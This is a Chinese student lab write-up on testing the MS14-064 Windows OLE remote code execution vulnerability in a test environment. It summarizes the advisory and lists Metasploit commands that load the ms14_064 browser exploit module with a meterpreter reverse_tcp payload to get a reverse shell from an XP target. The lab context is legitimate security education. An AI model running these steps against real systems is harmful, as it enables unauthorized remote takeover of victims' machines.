zoukankan      html  css  js  c++  java
  • MS14-064 漏洞测试入侵——20145301

    MS14-064 漏洞测试入侵

    Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术

    执行摘要

    • 此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。 对于 Microsoft Windows 所有受支持的版本,此安全更新的等级为“严重”。更多详细信息可见:微软安全技术中心

    • 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本

    实践过程

    • 此漏洞利用的模块 :exploit/windows/browser/ms14_064_ole_code_execution 
    执行命令:
    • msfconsole //启动MSF

    • search ms14 //可以搜索14年的漏洞

    • use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

    • show payload //查看可用

    • set payload windows/meterpreter/reverse_tcp //设置反弹连接shell

    • info查看详细信息
    • 特别注意:上图在requied列中“yes”的属性是必需要的。其中标记的第一个属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell。 所以msf中的exp代码只对安装powershell的系统生效。查看信息,可以攻击的系统有xp和win7

    • 各个属性配置好后 执行exploit即可

    • 得到一个URL地址,到靶机上进行(xp)测试

    • kail反弹了一个shell,测试成功

  • 相关阅读:
    设计模式总结
    设计模式之工厂
    C#
    UML画图总结
    UML视频总结
    类图
    读取文件信息
    HMAC算法加密
    SHA_1计算消息摘要
    获取指定长度的随机字符串
  • 原文地址:https://www.cnblogs.com/5301z/p/6714300.html
Copyright © 2011-2022 走看看